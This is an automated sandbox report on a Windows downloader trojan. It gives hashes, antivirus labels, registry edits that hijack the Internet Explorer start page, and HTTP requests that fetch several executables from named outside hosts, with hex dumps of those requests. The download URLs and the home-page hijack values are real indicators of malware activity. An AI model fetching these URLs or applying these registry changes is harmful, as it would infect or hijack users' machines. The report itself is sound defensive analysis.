Analysis Date2014-12-23 18:07:29
MD51afcd63a0c6b4161cfe7fa199bf98dad
SHA11cba241fe10eb96c8e9ae427d786214f54dec1b4

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionCODE md5: 4768ac006f4daf331546f8965de74c4c sha1: 2e58759eeeb8e8ad937f930495809504ecb31c9c size: 111104
SectionDATA md5: e27f5b25bd65ab61e88cbc6b5c5d9307 sha1: 48643b0a897e814be9816d8c61afb1a4d50ec5f0 size: 2048
SectionBSS md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.idata md5: 80d4a354669fdf7f255fade55444f403 sha1: 82f5849a5506cb2867e81e1fe7095a011af17b4d size: 3584
Section.tls md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.rdata md5: 151f1b071e65a7a02daeee83cba745d8 sha1: 23e7099b5a6552164d3e69673e28340078320a46 size: 512
Section.reloc md5: 453f8883b0741a50127a433422f47a15 sha1: eadb3573649fd4ffb22cde7f574f8c57169212d4 size: 7680
Section.rsrc md5: a02048652481dac1b3f5ca9dc0c7e788 sha1: c07570c03825da5bb472e88712e515fba0a16768 size: 19456
Timestamp1992-06-19 22:22:17
PackerBorland Delphi 4.0
PEhash6c9112d837b970d6fcc9995dda3d15aa0b7eff93
IMPhash26b87ed49d3f10064bcd5e61c061292a
AV360 SafeGen:Trojan.Heur.iGW@yPhYBUhbj
AVAd-AwareGen:Trojan.Heur.iGW@yPhYBUhbj
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVArcabit (arcavir)Gen:Trojan.Heur.iGW@yPhYBUhbj
AVAuthentiumW32/Delfloader.B.gen!Eldorado
AVAvira (antivir)TR/ATRAPS.Gen
AVBullGuardGen:Trojan.Heur.iGW@yPhYBUhbj
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. WebDLOADER.Trojan
AVEmsisoftGen:Trojan.Heur.iGW@yPhYBUhbj
AVEset (nod32)Win32/StartPage.OOT
AVFortinetW32/StartPage.OOT!tr
AVFrisk (f-prot)W32/Delfloader.B.gen!Eldorado
AVF-SecureGen:Trojan.Heur.iGW@yPhYBUhbj
AVGrisoft (avg)Downloader.Rozena
AVIkarusTrojan.Win32.StartPage
AVK7Trojan ( 7000000f1 )
AVKasperskyTrojan-Downloader.Win32.Generic
AVMalwareBytesTrojan.SelfDel
AVMcafeeno_virus
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)Gen:Trojan.Heur.iGW@yPhYBUhbj
AVRisingno_virus
AVSophosMal/DelpDldr-F
AVSymantecTrojan.Gen.2
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\ ➝
"C:\Program Files\Internet Explorer\iexplore.exe" http://www.9365.info\\x00
RegistryHKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\ ➝
"C:\Program Files\Internet Explorer\iexplore.exe" http://www.9365.info\\x00
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet explorer\Main\Start Page ➝
http://www.9365.info\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\faa5_appcompat.txt
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates ProcessC:\WINDOWS\system32\dwwin.exe -x -s 552
Creates Mutexnsgdrtwnsgdrtwa
Winsock DNS114.215.104.141
Winsock DNSclick.t3nlink.com
Winsock DNSdown.9vh.net
Winsock DNS117.21.183.24
Winsock DNSdl.3ezj.com
Winsock DNSdown.tianyunxj.com
Winsock DNSdls.oss-cn-hangzhou.aliyuncs.com
Winsock DNSdown.chinashangrui.com
Winsock DNSqkt.ksxbyy.com
Winsock URLhttp://down.9vh.net/apples_5_1008.exe
Winsock URLhttp://down.tianyunxj.com/tqrl_89_177560.exe
Winsock URLhttp://dls.oss-cn-hangzhou.aliyuncs.com/IFoxInstall-y-c203945859-run-s-x.exe
Winsock URLhttp://114.215.104.141/hzsoft/IFoxInstall-y-c203945859-run-s-x.exe
Winsock URLhttp://dl.3ezj.com/s/QmYM_45_189315.exe
Winsock URLhttp://117.21.183.24/ifox/TGQgoEo3TGwCodVok5XuJEsdJwuYq5QdqwXYol-WaExNs91v/IFoxInstall-y-c203945859-run-s-x.exe
Winsock URLhttp://click.t3nlink.com/link/140896/setup_2948-140896.exe
Winsock URLhttp://down.chinashangrui.com/xxnz/xksd_50091167828.exe
Winsock URLhttp://qkt.ksxbyy.com/qukt/bind/-2408_1_qkt.exe

Process
↳ C:\WINDOWS\system32\dwwin.exe -x -s 552

Network Details:

DNSdls.oss-cn-hangzhou.aliyuncs.com
Type: A
112.124.219.90
DNSdown.9vh.net
Type: A
222.186.60.3
DNSdown.chinashangrui.com
Type: A
222.186.60.106
DNSdown.chinashangrui.com
Type: A
222.186.60.77
DNStclick.wauee.net
Type: A
120.132.61.235
DNS08911.xdwscache.glb0.lxdns.com
Type: A
8.37.235.5
DNS08911.xdwscache.glb0.lxdns.com
Type: A
8.37.235.6
DNS08911.xdwscache.glb0.lxdns.com
Type: A
8.37.234.3
DNS08911.xdwscache.glb0.lxdns.com
Type: A
8.37.234.4
DNS08911.xdwscache.glb0.lxdns.com
Type: A
8.37.235.2
DNS08911.xdwscache.glb0.lxdns.com
Type: A
8.37.235.3
DNSqkt.ksxbyy.com
Type: A
61.155.138.216
DNSc06.i06.arnic.hadns.net
Type: A
183.61.10.249
DNSc06.i06.arnic.hadns.net
Type: A
183.57.148.246
DNSclick.t3nlink.com
Type: A
DNSdl.3ezj.com
Type: A
DNSdown.tianyunxj.com
Type: A
HTTP GEThttp://dls.oss-cn-hangzhou.aliyuncs.com/IFoxInstall-y-c203945859-run-s-x.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://114.215.104.141/hzsoft/IFoxInstall-y-c203945859-run-s-x.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://117.21.183.24/ifox/TGQgoEo3TGwCodVok5XuJEsdJwuYq5QdqwXYol-WaExNs91v/IFoxInstall-y-c203945859-run-s-x.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://down.9vh.net/apples_5_1008.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://down.9vh.net/apples_5_1008.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://down.9vh.net/apples_5_1008.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://down.chinashangrui.com/xxnz/xksd_50091167828.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://down.chinashangrui.com/xxnz/xksd_50091167828.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://down.chinashangrui.com/xxnz/xksd_50091167828.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://click.t3nlink.com/link/140896/setup_2948-140896.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://click.t3nlink.com/link/140896/setup_2948-140896.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://click.t3nlink.com/link/140896/setup_2948-140896.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://dl.3ezj.com/s/QmYM_45_189315.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://dl.3ezj.com/s/QmYM_45_189315.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://dl.3ezj.com/s/QmYM_45_189315.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://qkt.ksxbyy.com/qukt/bind/-2408_1_qkt.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://qkt.ksxbyy.com/qukt/bind/-2408_1_qkt.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://qkt.ksxbyy.com/qukt/bind/-2408_1_qkt.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://down.tianyunxj.com/tqrl_89_177560.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://down.tianyunxj.com/tqrl_89_177560.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://down.tianyunxj.com/tqrl_89_177560.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 112.124.219.90:80
Flows TCP192.168.1.1:1033 ➝ 114.215.104.141:80
Flows TCP192.168.1.1:1034 ➝ 117.21.183.24:80
Flows TCP192.168.1.1:1035 ➝ 222.186.60.3:80
Flows TCP192.168.1.1:1036 ➝ 222.186.60.3:80
Flows TCP192.168.1.1:1037 ➝ 222.186.60.3:80
Flows TCP192.168.1.1:1038 ➝ 222.186.60.106:80
Flows TCP192.168.1.1:1039 ➝ 222.186.60.106:80
Flows TCP192.168.1.1:1040 ➝ 222.186.60.106:80
Flows TCP192.168.1.1:1041 ➝ 120.132.61.235:80
Flows TCP192.168.1.1:1042 ➝ 120.132.61.235:80
Flows TCP192.168.1.1:1043 ➝ 120.132.61.235:80
Flows TCP192.168.1.1:1044 ➝ 8.37.235.5:80
Flows TCP192.168.1.1:1045 ➝ 8.37.235.5:80
Flows TCP192.168.1.1:1046 ➝ 8.37.235.5:80
Flows TCP192.168.1.1:1047 ➝ 61.155.138.216:80
Flows TCP192.168.1.1:1048 ➝ 61.155.138.216:80
Flows TCP192.168.1.1:1049 ➝ 61.155.138.216:80
Flows TCP192.168.1.1:1050 ➝ 183.61.10.249:80
Flows TCP192.168.1.1:1051 ➝ 183.61.10.249:80
Flows TCP192.168.1.1:1052 ➝ 183.61.10.249:80

Raw Pcap
0x00000000 (00000)   47455420 2f49466f 78496e73 74616c6c   GET /IFoxInstall
0x00000010 (00016)   2d792d63 32303339 34353835 392d7275   -y-c203945859-ru
0x00000020 (00032)   6e2d732d 782e6578 65204854 54502f31   n-s-x.exe HTTP/1
0x00000030 (00048)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000040 (00064)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000050 (00080)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000080 (00128)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000090 (00144)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x000000a0 (00160)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000b0 (00176)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000c0 (00192)   646c732e 6f73732d 636e2d68 616e677a   dls.oss-cn-hangz
0x000000d0 (00208)   686f752e 616c6979 756e6373 2e636f6d   hou.aliyuncs.com
0x000000e0 (00224)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x000000f0 (00240)   65702d41 6c697665 0d0a0d0a            ep-Alive....

0x00000000 (00000)   47455420 2f687a73 6f66742f 49466f78   GET /hzsoft/IFox
0x00000010 (00016)   496e7374 616c6c2d 792d6332 30333934   Install-y-c20394
0x00000020 (00032)   35383539 2d72756e 2d732d78 2e657865   5859-run-s-x.exe
0x00000030 (00048)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000040 (00064)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000050 (00080)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000060 (00096)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000070 (00112)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000080 (00128)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000090 (00144)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000a0 (00160)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x000000b0 (00176)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000c0 (00192)   0a486f73 743a2031 31342e32 31352e31   .Host: 114.215.1
0x000000d0 (00208)   30342e31 34310d0a 436f6e6e 65637469   04.141..Connecti
0x000000e0 (00224)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000f0 (00240)   0d0a2d41 6c697665 0d0a0d0a            ..-Alive....

0x00000000 (00000)   47455420 2f69666f 782f5447 51676f45   GET /ifox/TGQgoE
0x00000010 (00016)   6f335447 77436f64 566f6b35 58754a45   o3TGwCodVok5XuJE
0x00000020 (00032)   73644a77 75597135 51647177 58596f6c   sdJwuYq5QdqwXYol
0x00000030 (00048)   2d576145 784e7339 31762f49 466f7849   -WaExNs91v/IFoxI
0x00000040 (00064)   6e737461 6c6c2d79 2d633230 33393435   nstall-y-c203945
0x00000050 (00080)   3835392d 72756e2d 732d782e 65786520   859-run-s-x.exe 
0x00000060 (00096)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000070 (00112)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000080 (00128)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000090 (00144)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x000000a0 (00160)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x000000b0 (00176)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x000000c0 (00192)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x000000d0 (00208)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x000000e0 (00224)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000f0 (00240)   486f7374 3a203131 372e3231 2e313833   Host: 117.21.183
0x00000100 (00256)   2e32340d 0a436f6e 6e656374 696f6e3a   .24..Connection:
0x00000110 (00272)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f617070 6c65735f 355f3130   GET /apples_5_10
0x00000010 (00016)   30382e65 78652048 5454502f 312e310d   08.exe HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 202a2f2a 0d0a4163   .Accept: */*..Ac
0x00000030 (00048)   63657074 2d456e63 6f64696e 673a2067   cept-Encoding: g
0x00000040 (00064)   7a69702c 20646566 6c617465 0d0a5573   zip, deflate..Us
0x00000050 (00080)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000060 (00096)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000070 (00112)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000080 (00128)   646f7773 204e5420 352e313b 20535631   dows NT 5.1; SV1
0x00000090 (00144)   3b202e4e 45542043 4c522032 2e302e35   ; .NET CLR 2.0.5
0x000000a0 (00160)   30373237 290d0a48 6f73743a 20646f77   0727)..Host: dow
0x000000b0 (00176)   6e2e3976 682e6e65 740d0a43 6f6e6e65   n.9vh.net..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a205356 313b202e 4e455420   e.... SV1; .NET 
0x000000e0 (00224)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000f0 (00240)   486f7374 3a203131 372e3231 2e313833   Host: 117.21.183
0x00000100 (00256)   2e32340d 0a436f6e 6e656374 696f6e3a   .24..Connection:
0x00000110 (00272)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f617070 6c65735f 355f3130   GET /apples_5_10
0x00000010 (00016)   30382e65 78652048 5454502f 312e310d   08.exe HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 202a2f2a 0d0a4163   .Accept: */*..Ac
0x00000030 (00048)   63657074 2d456e63 6f64696e 673a2067   cept-Encoding: g
0x00000040 (00064)   7a69702c 20646566 6c617465 0d0a5573   zip, deflate..Us
0x00000050 (00080)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000060 (00096)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000070 (00112)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000080 (00128)   646f7773 204e5420 352e313b 20535631   dows NT 5.1; SV1
0x00000090 (00144)   3b202e4e 45542043 4c522032 2e302e35   ; .NET CLR 2.0.5
0x000000a0 (00160)   30373237 290d0a48 6f73743a 20646f77   0727)..Host: dow
0x000000b0 (00176)   6e2e3976 682e6e65 740d0a43 6f6e6e65   n.9vh.net..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a205356 313b202e 4e455420   e.... SV1; .NET 
0x000000e0 (00224)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000f0 (00240)   486f7374 3a203131 372e3231 2e313833   Host: 117.21.183
0x00000100 (00256)   2e32340d 0a436f6e 6e656374 696f6e3a   .24..Connection:
0x00000110 (00272)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f617070 6c65735f 355f3130   GET /apples_5_10
0x00000010 (00016)   30382e65 78652048 5454502f 312e310d   08.exe HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 202a2f2a 0d0a4163   .Accept: */*..Ac
0x00000030 (00048)   63657074 2d456e63 6f64696e 673a2067   cept-Encoding: g
0x00000040 (00064)   7a69702c 20646566 6c617465 0d0a5573   zip, deflate..Us
0x00000050 (00080)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000060 (00096)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000070 (00112)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000080 (00128)   646f7773 204e5420 352e313b 20535631   dows NT 5.1; SV1
0x00000090 (00144)   3b202e4e 45542043 4c522032 2e302e35   ; .NET CLR 2.0.5
0x000000a0 (00160)   30373237 290d0a48 6f73743a 20646f77   0727)..Host: dow
0x000000b0 (00176)   6e2e3976 682e6e65 740d0a43 6f6e6e65   n.9vh.net..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a205356 313b202e 4e455420   e.... SV1; .NET 
0x000000e0 (00224)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000f0 (00240)   486f7374 3a203131 372e3231 2e313833   Host: 117.21.183
0x00000100 (00256)   2e32340d 0a436f6e 6e656374 696f6e3a   .24..Connection:
0x00000110 (00272)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f78786e 7a2f786b 73645f35   GET /xxnz/xksd_5
0x00000010 (00016)   30303931 31363738 32382e65 78652048   0091167828.exe H
0x00000020 (00032)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000030 (00048)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000040 (00064)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000050 (00080)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000060 (00096)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000070 (00112)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000080 (00128)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000090 (00144)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x000000a0 (00160)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000b0 (00176)   6f73743a 20646f77 6e2e6368 696e6173   ost: down.chinas
0x000000c0 (00192)   68616e67 7275692e 636f6d0d 0a436f6e   hangrui.com..Con
0x000000d0 (00208)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000e0 (00224)   6976650d 0a0d0a2e 35303732 37290d0a   ive.....50727)..
0x000000f0 (00240)   486f7374 3a203131 372e3231 2e313833   Host: 117.21.183
0x00000100 (00256)   2e32340d 0a436f6e 6e656374 696f6e3a   .24..Connection:
0x00000110 (00272)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f78786e 7a2f786b 73645f35   GET /xxnz/xksd_5
0x00000010 (00016)   30303931 31363738 32382e65 78652048   0091167828.exe H
0x00000020 (00032)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000030 (00048)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000040 (00064)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000050 (00080)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000060 (00096)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000070 (00112)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000080 (00128)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000090 (00144)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x000000a0 (00160)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000b0 (00176)   6f73743a 20646f77 6e2e6368 696e6173   ost: down.chinas
0x000000c0 (00192)   68616e67 7275692e 636f6d0d 0a436f6e   hangrui.com..Con
0x000000d0 (00208)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000e0 (00224)   6976650d 0a0d0a2e 35303732 37290d0a   ive.....50727)..
0x000000f0 (00240)   486f7374 3a203131 372e3231 2e313833   Host: 117.21.183
0x00000100 (00256)   2e32340d 0a436f6e 6e656374 696f6e3a   .24..Connection:
0x00000110 (00272)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f78786e 7a2f786b 73645f35   GET /xxnz/xksd_5
0x00000010 (00016)   30303931 31363738 32382e65 78652048   0091167828.exe H
0x00000020 (00032)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000030 (00048)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000040 (00064)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000050 (00080)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000060 (00096)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000070 (00112)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000080 (00128)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000090 (00144)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x000000a0 (00160)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000b0 (00176)   6f73743a 20646f77 6e2e6368 696e6173   ost: down.chinas
0x000000c0 (00192)   68616e67 7275692e 636f6d0d 0a436f6e   hangrui.com..Con
0x000000d0 (00208)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000e0 (00224)   6976650d 0a0d0a2e 35303732 37290d0a   ive.....50727)..
0x000000f0 (00240)   486f7374 3a203131 372e3231 2e313833   Host: 117.21.183
0x00000100 (00256)   2e32340d 0a436f6e 6e656374 696f6e3a   .24..Connection:
0x00000110 (00272)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f6c696e 6b2f3134 30383936   GET /link/140896
0x00000010 (00016)   2f736574 75705f32 3934382d 31343038   /setup_2948-1408
0x00000020 (00032)   39362e65 78652048 5454502f 312e310d   96.exe HTTP/1.1.
0x00000030 (00048)   0a416363 6570743a 202a2f2a 0d0a4163   .Accept: */*..Ac
0x00000040 (00064)   63657074 2d456e63 6f64696e 673a2067   cept-Encoding: g
0x00000050 (00080)   7a69702c 20646566 6c617465 0d0a5573   zip, deflate..Us
0x00000060 (00096)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000070 (00112)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000080 (00128)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000090 (00144)   646f7773 204e5420 352e313b 20535631   dows NT 5.1; SV1
0x000000a0 (00160)   3b202e4e 45542043 4c522032 2e302e35   ; .NET CLR 2.0.5
0x000000b0 (00176)   30373237 290d0a48 6f73743a 20636c69   0727)..Host: cli
0x000000c0 (00192)   636b2e74 336e6c69 6e6b2e63 6f6d0d0a   ck.t3nlink.com..
0x000000d0 (00208)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000e0 (00224)   2d416c69 76650d0a 0d0a3732 37290d0a   -Alive....727)..
0x000000f0 (00240)   486f7374 3a203131 372e3231 2e313833   Host: 117.21.183
0x00000100 (00256)   2e32340d 0a436f6e 6e656374 696f6e3a   .24..Connection:
0x00000110 (00272)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f6c696e 6b2f3134 30383936   GET /link/140896
0x00000010 (00016)   2f736574 75705f32 3934382d 31343038   /setup_2948-1408
0x00000020 (00032)   39362e65 78652048 5454502f 312e310d   96.exe HTTP/1.1.
0x00000030 (00048)   0a416363 6570743a 202a2f2a 0d0a4163   .Accept: */*..Ac
0x00000040 (00064)   63657074 2d456e63 6f64696e 673a2067   cept-Encoding: g
0x00000050 (00080)   7a69702c 20646566 6c617465 0d0a5573   zip, deflate..Us
0x00000060 (00096)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000070 (00112)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000080 (00128)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000090 (00144)   646f7773 204e5420 352e313b 20535631   dows NT 5.1; SV1
0x000000a0 (00160)   3b202e4e 45542043 4c522032 2e302e35   ; .NET CLR 2.0.5
0x000000b0 (00176)   30373237 290d0a48 6f73743a 20636c69   0727)..Host: cli
0x000000c0 (00192)   636b2e74 336e6c69 6e6b2e63 6f6d0d0a   ck.t3nlink.com..
0x000000d0 (00208)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000e0 (00224)   2d416c69 76650d0a 0d0a3732 37290d0a   -Alive....727)..
0x000000f0 (00240)   486f7374 3a203131 372e3231 2e313833   Host: 117.21.183
0x00000100 (00256)   2e32340d 0a436f6e 6e656374 696f6e3a   .24..Connection:
0x00000110 (00272)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f6c696e 6b2f3134 30383936   GET /link/140896
0x00000010 (00016)   2f736574 75705f32 3934382d 31343038   /setup_2948-1408
0x00000020 (00032)   39362e65 78652048 5454502f 312e310d   96.exe HTTP/1.1.
0x00000030 (00048)   0a416363 6570743a 202a2f2a 0d0a4163   .Accept: */*..Ac
0x00000040 (00064)   63657074 2d456e63 6f64696e 673a2067   cept-Encoding: g
0x00000050 (00080)   7a69702c 20646566 6c617465 0d0a5573   zip, deflate..Us
0x00000060 (00096)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000070 (00112)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000080 (00128)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000090 (00144)   646f7773 204e5420 352e313b 20535631   dows NT 5.1; SV1
0x000000a0 (00160)   3b202e4e 45542043 4c522032 2e302e35   ; .NET CLR 2.0.5
